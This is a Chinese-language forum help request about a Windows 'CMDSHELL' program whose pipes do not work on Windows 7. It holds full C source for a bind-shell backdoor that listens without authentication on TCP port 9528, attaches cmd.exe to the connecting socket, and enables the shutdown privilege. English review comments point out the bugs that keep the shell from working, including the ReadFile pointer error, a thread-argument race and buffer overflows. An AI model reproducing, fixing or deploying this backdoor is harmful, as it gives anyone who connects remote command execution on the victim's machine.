
【求助】CMDSHELL

W7下的CMDSHELL和NT系统下的是一样的吗？为什么管道不能使用？求查看代码中的错误。
#include "head.h"
#define RECV_LEN 4096   // size in bytes of the buffer OutputThreadPro hands to ReadFile
#define PATH_MAX 256    // NOTE(review): used both as a malloc byte count and as the TCHAR count
                        // passed to GetSystemDirectory (OpenCMD); those differ in a UNICODE build — verify

bool st = true;         // NOTE(review): only referenced from commented-out code in InputThreadPro; effectively unused

// Thread: forwards bytes received on the socket into the write end of the
// child's stdin pipe. lpParam points at a ThreadNode (declared in head.h,
// not visible here); the struct is copied by value on entry.
DWORD WINAPI InputThreadPro(LPVOID lpParam)
{
    ThreadNode lpNode = *(ThreadNode*)lpParam; // NOTE(review): copied once at thread start; whether a value the
                                               // caller stores in *lpParam after CreateThread is seen here
                                               // depends on timing — confirm against the caller
    char* Buffer = (char*)malloc(PATH_MAX);    // PATH_MAX (256) bytes; malloc result unchecked, never freed
    int ret = 0;
    //int retlen = 0;
    DWORD Bufferlen;                           // bytes written by WriteFile (never examined)
    while(true)
    {
        //ZeroMemory(Buffer,PATH_MAX);
        ret = recv(lpNode.T_sock,Buffer,1024,0); // NOTE(review): asks for up to 1024 bytes into a 256-byte
                                                 // allocation — a heap overflow whenever more than 256
                                                 // bytes arrive at once
        if(ret > 0 && ret != SOCKET_ERROR)       // ret > 0 already excludes SOCKET_ERROR (-1)
        {
            WriteFile(lpNode.T_pipe,Buffer,ret,&Bufferlen,NULL); // return value not checked
        }
        else
        {
            // recv returned 0 (peer closed) or SOCKET_ERROR: nothing is done and the loop keeps
            // polling the dead socket every 50 ms; the exit handling is commented out
            //WriteFile(lpNode.T_pipe,"exit\r\n",sizeof("exit\r\n"),&Bufferlen,NULL);
            //closesocket(lpNode.T_sock);
            //st = false;
            //break;
        }
        /*retlen += ret;
        if(ret == 0)
        {
        break;
        }*/
        Sleep(50);
    }
    return true; // unreachable: the loop above has no break
}

// Thread: polls the read end of the child's stdout/stderr pipe and forwards
// whatever is available to the socket. lpParam points at a ThreadNode
// (declared in head.h, not visible here); copied by value on entry.
DWORD WINAPI OutputThreadPro(LPVOID lpParam)
{
    ThreadNode lpNode = *(ThreadNode*)lpParam;
    char* Buffer = (char*)malloc(RECV_LEN);  // RECV_LEN-byte buffer; malloc result unchecked, never freed
    DWORD Bufferlen, BufferLen;              // Bufferlen: bytes available (PeekNamedPipe); BufferLen: bytes read (ReadFile)
    bool st1;
    while(true)
    {
        st1 = PeekNamedPipe(lpNode.T_pipe,NULL,0,NULL,&Bufferlen,NULL); // non-blocking: only asks how many bytes are queued
        if(st1 == true && Bufferlen > 0)
        {
            ReadFile(lpNode.T_pipe,&Buffer, RECV_LEN,&BufferLen,NULL);
            // NOTE(review): &Buffer is the address of the pointer variable itself (char**), not of the
            // heap block it points to, so ReadFile writes up to RECV_LEN bytes over this stack frame
            // and clobbers the pointer; the heap buffer never receives the child's output. This is
            // the most likely reason the pipe appears not to work.
            if(BufferLen > 0)
            {
                SendData(Buffer,lpNode.T_sock); // BufferLen is not passed on: SendData does not know how many bytes are valid
                ZeroMemory(Buffer,RECV_LEN);
            }
        }
        Sleep(50);
    }
    return true; // unreachable: the loop above has no break
}


// Launches cmd.exe from the system directory with its stdin attached to
// hReadPipe1 and stdout/stderr attached to hWritePipe2 (both handles must be
// inheritable). Returns the BOOL result of CreateProcess as a bool.
bool OpenCMD(HANDLE hReadPipe1,HANDLE hWritePipe2)
{
    STARTUPINFO os;
    PROCESS_INFORMATION pi;
    os.cb = sizeof(STARTUPINFO);
    GetStartupInfo(&os); // start from this process's startup info; dwFlags and std handles are overwritten below
    TCHAR* szCmdLine = (TCHAR*)malloc(PATH_MAX);
    // NOTE(review): malloc takes a byte count, but GetSystemDirectory's second argument is a count of
    // TCHARs — in a UNICODE build 256 TCHARs is 512 bytes, twice the allocation, and wcscat then
    // appends after that. The malloc result is unchecked and the buffer is never freed.
    GetSystemDirectory(szCmdLine,PATH_MAX);
    wcscat(szCmdLine,TEXT("\\cmd.exe")); // wcscat on a TCHAR* only compiles when TCHAR is wchar_t (UNICODE build)
    os.dwFlags = /*STARTF_USESHOWWINDOW | */STARTF_USESTDHANDLES;
    //os.wShowWindow = SW_HIDE;
    os.hStdInput = hReadPipe1;
    os.hStdOutput = os.hStdError = hWritePipe2;
    BOOL a = CreateProcess(szCmdLine, NULL, NULL, NULL, true, 0, NULL, NULL, &os, &pi); // bInheritHandles=TRUE so the pipe ends reach the child
    // NOTE(review): pi.hProcess and pi.hThread are never closed, so both handles leak on success
    if(a)
    {
        return true;
    }
    else
    {
        return false;
    }
}

// Initialises Winsock 2.2 for this process; true when WSAStartup succeeds.
bool SocketInfo()
{
    WSADATA wsa = {0};
    return WSAStartup(MAKEWORD(2,2),&wsa) == 0;
}

// Sends from Buffer to ServerSock in fixed 1024-byte chunks until send()
// returns 0 or an error. There is no length parameter, so the function has
// no way of knowing how much of Buffer holds real data.
void SendData(char* Buffer,SOCKET ServerSock)
{
    int ret = 0;
    int RectLen = 0; // running offset into Buffer
    do
    {
        ret = send(ServerSock,Buffer+RectLen,1024,0); // NOTE(review): always 1024 bytes, regardless of how many are valid
        RectLen += ret;
        if(ret <= 0)
        {
            break;
        }
    }
    while(RectLen>0);
    // NOTE(review): after the first successful send RectLen is > 0 and never decreases, so the loop
    // ends only when send() fails; each further iteration reads Buffer+1024, +2048, ... past the
    // caller's allocation (out-of-bounds read that also transmits unrelated heap contents).
}

// Creates a TCP socket bound to 0.0.0.0:9528, accepts one connection and
// returns the accepted socket; returns 0 on any failure. Both parameters are
// passed by value, so the caller's copies are not updated and the listening
// socket is neither returned nor closed.
SOCKET CreatSocket(SOCKET ServerSock, sockaddr_in ServerSockaddr)
{
    int n;
    if(SocketInfo() == true)
    {
        ServerSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(ServerSock != SOCKET_ERROR) // NOTE(review): socket() reports failure as INVALID_SOCKET; this check
                                       // appears to work only because -1 converts to the same unsigned value
        {
            ServerSockaddr.sin_family = AF_INET;
            ServerSockaddr.sin_port = htons(9528);
            ServerSockaddr.sin_addr.s_addr = htonl(INADDR_ANY); // every interface; nothing authenticates the peer that connects
            n = bind(ServerSock,(sockaddr *)&ServerSockaddr,sizeof(ServerSockaddr));
            int a = WSAGetLastError(); // unused: the error code is fetched but never examined
            if(n != SOCKET_ERROR)
            {
                if(listen(ServerSock,10) != SOCKET_ERROR)
                {
                    int leng = sizeof(ServerSockaddr);
                    int* len = &leng;
                    SOCKET acceptsock = accept(ServerSock,(struct sockaddr *)&ServerSockaddr,len); // blocks until one client connects
                    if(acceptsock != SOCKET_ERROR) // NOTE(review): accept() also reports failure as INVALID_SOCKET
                    {
                        MessageBox(NULL,TEXT("端口打开"),TEXT("端口"),MB_OK);
                        return acceptsock;
                    }
                }
            }

        }
    }
    return 0; // NOTE(review): 0 differs from SOCKET_ERROR, so a caller testing `!= SOCKET_ERROR` does not see this failure
}

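// Enables SE_SHUTDOWN_NAME in the current process token.
// Returns true when the privilege was actually enabled, false otherwise; each
// failure path shows the same MessageBox as before.
// Fixes: the token handle is now closed on every path (it previously leaked on
// success and after a LookupPrivilegeValue failure), and an AdjustTokenPrivileges
// call that returned TRUE but assigned nothing (ERROR_NOT_ALL_ASSIGNED) is
// reported as failure instead of success.
bool EnableShutDownPriv()
{
    HANDLE Token = NULL;
    TOKEN_PRIVILEGES Tkp = {0};
    if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY ,&Token))
    {
        MessageBox(NULL,TEXT("标题"),TEXT("关机了0!"),MB_OK);
        return false;
    }
    bool ok = false;
    if(!LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&Tkp.Privileges[0].Luid))
    {
        MessageBox(NULL,TEXT("标题"),TEXT("关机了1!"),MB_OK);
    }
    else
    {
        Tkp.PrivilegeCount = 1;
        Tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        // AdjustTokenPrivileges returns TRUE even when the token does not hold the
        // privilege; GetLastError() then reports ERROR_NOT_ALL_ASSIGNED.
        if(!AdjustTokenPrivileges(Token,false,&Tkp,sizeof(TOKEN_PRIVILEGES),NULL,NULL)
           || GetLastError() == ERROR_NOT_ALL_ASSIGNED)
        {
            MessageBox(NULL,TEXT("标题"),TEXT("关机了3!"),MB_OK);
        }
        else
        {
            ok = true;
        }
    }
    CloseHandle(Token); // single exit: the token is released on every path
    return ok;
}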

// Shutdown stub: on an NT-family platform it enables the shutdown privilege
// and shows a message box (the ExitWindowsEx call itself is commented out);
// on any other platform it shows a different message box. Always returns
// false — the original's trailing `return true` was unreachable.
bool SetSystemClose()
{
    OSVERSIONINFO osvi = {0};
    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx(&osvi);
    if(osvi.dwPlatformId != VER_PLATFORM_WIN32_NT)
    {
        MessageBox(NULL,TEXT("标题"),TEXT("关机了ss!"),MB_OK);
        return false;
    }
    if(EnableShutDownPriv() == true)
    {
        //ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0);
        MessageBox(NULL,TEXT("标题"),TEXT("关机了!"),MB_OK);
    }
    return false;
}

// Main flow: wait for one TCP client, create two anonymous pipes, start
// cmd.exe on them and run one forwarding thread per direction. Does not
// return in practice: both worker threads loop forever, so the
// WaitForMultipleObjects below never completes.
void ShellCMD()
{
    SOCKET ServerSocket = NULL; // NOTE(review): NULL for an integer handle type; passed by value, so CreatSocket
                                // cannot hand the listening socket back and it is never closed
    sockaddr_in ServerSockaddr = {0};
    //bool SockCondition = false;
    SOCKET AcceptSock = CreatSocket(ServerSocket,ServerSockaddr); // blocks in accept()
    if(AcceptSock != SOCKET_ERROR) // NOTE(review): CreatSocket returns 0 on failure, which passes this test,
                                   // so execution continues with an unusable socket
    {
        MessageBox(NULL,TEXT("连接上了!"),TEXT("连接"),MB_OK);
    }
    DWORD dwThreadWrite, dwThreadRead;
    HANDLE hReadPipe1 = NULL,hWritePipe1 = NULL, hReadPipe2 = NULL, hWritePipe2 = NULL; // pipe 1: this process -> child stdin; pipe 2: child stdout/stderr -> this process
    SECURITY_ATTRIBUTES la = {0}; // inheritable, so the child process can use its pipe ends
    la.bInheritHandle = true;
    la.lpSecurityDescriptor = NULL;
    la.nLength = sizeof(SECURITY_ATTRIBUTES);
    int c1 = CreatePipe(&hReadPipe1,&hWritePipe1,&la,0); // c1/c2 are never checked
    int c2 = CreatePipe(&hReadPipe2,&hWritePipe2,&la,0);
    ThreadNode InNode = {0};
    InNode.T_sock = AcceptSock;
    bool cmd = OpenCMD(hReadPipe1,hWritePipe2); // result never checked
    InNode.T_pipe = hWritePipe1;
    HANDLE ReadThread = CreateThread(NULL,0,InputThreadPro,(LPVOID)&InNode,0,&dwThreadRead);
    InNode.T_pipe = hReadPipe2;
    // NOTE(review): the same InNode is handed to both threads and T_pipe is overwritten immediately
    // after the first CreateThread. Each thread copies *lpParam when it starts running, so which
    // handle the input thread ends up with depends on scheduling — a race on the thread argument.
    HANDLE WriteThread = CreateThread(NULL,0,OutputThreadPro,(LPVOID)&InNode,0,&dwThreadWrite);
    HANDLE szHandle[] = {ReadThread,WriteThread};
    WaitForMultipleObjects(2,szHandle,true,INFINITE); // waits for both threads; neither ever exits, and no handle is closed afterwards
    //SetSystemClose();
    MessageBox(NULL,TEXT("标题"),TEXT("关机了6!"),MB_OK); // test message
}


// Process entry point: enables the shutdown privilege (result ignored) and
// then runs the command-shell loop. None of the parameters are used.
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow)
{
    (void)hInstance;
    (void)hPrevInstance;
    (void)lpCmdLine;
    (void)nCmdShow;

    (void)EnableShutDownPriv();
    ShellCMD();
    //SetSystemClose();
    //OpenCMD();

    return 0;
}
